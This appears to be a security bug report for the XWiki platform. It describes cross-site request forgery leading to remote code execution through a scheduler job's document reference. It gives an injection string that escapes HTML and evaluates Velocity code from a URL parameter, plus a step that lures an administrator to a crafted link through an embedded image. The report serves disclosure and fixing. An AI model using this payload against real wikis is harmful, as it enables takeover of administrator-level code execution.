CSRF remote code execution through scheduler job's document reference

Steps to reproduce:

1. As a user without script, admin or programming right but regular edit right, create a document with reference

   ">]]{{/html}}{{async context="request.parameters"}}{{velocity}}#evaluate($request.eval).WebHome

   URL for easier creation: http://localhost:8080/xwiki/bin/view/%22%3E%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request/eval%29/

2. Add an object of type XWiki.SchedulerJobClass
3. Save
4. Get an admin to visit http://localhost:8080/xwiki/bin/view/Scheduler/?eval=$services.logging.getLogger(%22attacker%22).error(%22Hello%20from%20URL%20Parameter!%20I%20got%20programming:%20$services.security.authorization.hasAccess(%27programming%27)%22) - e.g., write a comment with an image with that URL.

Expected result:

The Scheduler page is normally displayed and no error is logged.

Actual result:

An error "ERROR attacker - Hello from URL Parameter! I got programming: true" is logged. The layout of the job scheduler page is broken: